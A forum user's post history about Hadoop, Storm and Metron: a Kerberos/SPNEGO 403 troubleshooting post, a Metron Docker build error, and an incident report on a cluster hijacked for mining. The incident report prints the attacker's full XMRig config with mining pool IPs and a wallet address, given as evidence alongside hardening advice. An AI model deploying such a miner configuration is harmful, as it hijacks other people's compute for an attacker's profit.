Member since
02-02-2018
6
Posts
2
Kudos Received
0
Solutions
09-14-2018
02:30 PM
We have a kerberised hdp cluster ( 2.6.5 ) deployed in AWS. AWS network architecture is in such a way that all the hdp component nodes are under private subnet and the access to them is only via ssh from bastion node which is in public subnet. We have enabled all the web components ( Storm UI, Metron UI, Metron Management UI etc ) available outside via AWS ELB load balancer to the outside world. Our kerberos server and kdc admin is available outside via ssh tunneling via bastion node, This is for the external accessing client to authenticate eg : Spnego. When we access our storm UI via browser with proper step taken for to pass spengo authentication, We are getting 403 error even with proper keytab and principal. Error getting in /var/log/storm/ui.out in storm UI hosted node Found KeyTab /etc/security/keytabs/spnego.service.keytab for HTTP/sdssystemmaster2@EXAMPLE.COM
Looking for keys for: HTTP/sdssystemmaster2@EXAMPLE.COM
Found unsupported keytype (3) for HTTP/sdssystemmaster2@EXAMPLE.COM
MemoryCache: add 1536315369/301662/8ABC886166F6808EA668D561462EDD37/metron@EXAMPLE.COM to metron@HOST. Steps followed : 1- Installed kerberos client 2- Copied krb5.conf file from kerberose node to local file krb5.ini and configured [libdefaults]
renew_lifetime = 7d
forwardable = true
default_realm = EXAMPLE.COM
ticket_lifetime = 24h
dns_lookup_realm = false
dns_lookup_kdc = false
default_ccache_name = /tmp/krb5cc_%{uid}
#default_tgs_enctypes = aes des3-cbc-sha1 rc4 des-cbc-md5
#default_tkt_enctypes = aes des3-cbc-sha1 rc4 des-cbc-md5
[logging]
default = FILE:/var/log/krb5kdc.log
admin_server = FILE:/var/log/kadmind.log
kdc = FILE:/var/log/krb5kdc.log
[realms]
EXAMPLE.COM = {
admin_server = localhost
kdc = localhost
} 3- Copied keytab file of principal - HTTP/sdssystemmaster2@EXAMPLE.COM spnego.service.keytab 4- kinit executed () and ticket seems to be generated fine (screenshot added) 5- Configured firefox about:config
network.negotiate- auth.trusted-uris : loadbalancer-url
network.negotiate-auth.delegation-uris : loadbalancer-url
network.negotiate-auth.gsslib : C:\Program Files\MIT\Kerberos\bin\gssapi64.dll
network.negotiate-auth.using-native-gsslib : false 6- Loaded the storm UI Storm UI spengo Kerberos configuration
ui.filter : org.apache.hadoop.security.authentication.server.AuthenticationFilter
ui.filter.params : {'type': 'kerberos', 'kerberos.principal': '{{storm_ui_jaas_principal}}', 'kerberos.keytab':'{{storm_ui_keytab_path}}' , 'kerberos.name.rules': 'DEFAULT'}
storm_ui_keytab : /etc/security/keytabs/spnego.service.keytab storm_ui_principal_name : HTTP/_HOST@EXAMPLE.COM
... View more
Labels:
- Labels:
-
Apache Storm
08-03-2018
07:25 AM
2 Kudos
Thankyou @Sindhu and @Rakesh S. I did a root cause analysis and found that our server is hosted in AWS which is a public cloud and we have not setup Kerberos or firewalls. In the nodes I can find the process w.conf running: yarn 21775 353 0.0 470060 12772 ? Ssl Aug02 5591:25 /var/tmp/java -c /var/tmp/w.conf Within /var/temp I can see a config.json which contains: {
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
{
"url": "158.69.133.20:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
},
{
"url": "192.99.142.249:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
},
{
"url": "202.144.193.110:3333", // URL of mining server
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
} which clearly shows some mining attack effected with our system. Worst of it, all the the files were created and process were running with root permissions. Even though I could not confirm the root cause, I guess, some attacker got access to our unprotected/unrestricted 8088 port and identified that the cluster is not Kerberized. Hence he tried some bruteforce and cracked our root password. Thus logged in to our AWS cluster and gained full access of our cluster. Conclusion: 1. Enable kerberos, add Knox, and secure your servers 2. Try to enable VPC 3. Refine the security groups to whitelist needed IPs and ports for HTTP and SSH 4. Give high security passwords for public clouds. 5. Change the default static user in Hadoop. Ambari > HDFS > Configurations >Custom core-site > Add Property hadoop.http.staticuser.user=yarn
... View more
08-03-2018
04:53 AM
Labels:
- Labels:
-
Apache Hadoop
-
Apache YARN
07-13-2018
06:15 AM
@Irshad Muhammed Yes.Metron Docker works like a charm in Windows. Thanks for the workaround.
... View more
07-11-2018
09:33 AM
We tried installing Metron docker in Windows 10. We installed JDK 1.8,Python 2.7,Visual Studio C++ Build Tools 2015,Maven 3.5 and Git. Environmental variables and path has been set correctly. Cloned the Metron from github. But when we run "mvn clean install -DskipTests" the installtion exits with error : [ERROR] Failed to execute goal com.github.eirslett:frontend-maven-plugin:1.3:npm (npm install) on project metron-config: Failed to run task: 'npm install' failed. (error code 1) -> [Help 1]
[ERROR]
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR]
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoFailureException
[ERROR]
[ERROR] After correcting the problems, you can resume the build with the command
[ERROR] mvn <goals> -rf :metron-config If anybody has faced this error before, please let me know the resolution.
... View more
Labels:
- Labels:
-
Apache Metron
-
Docker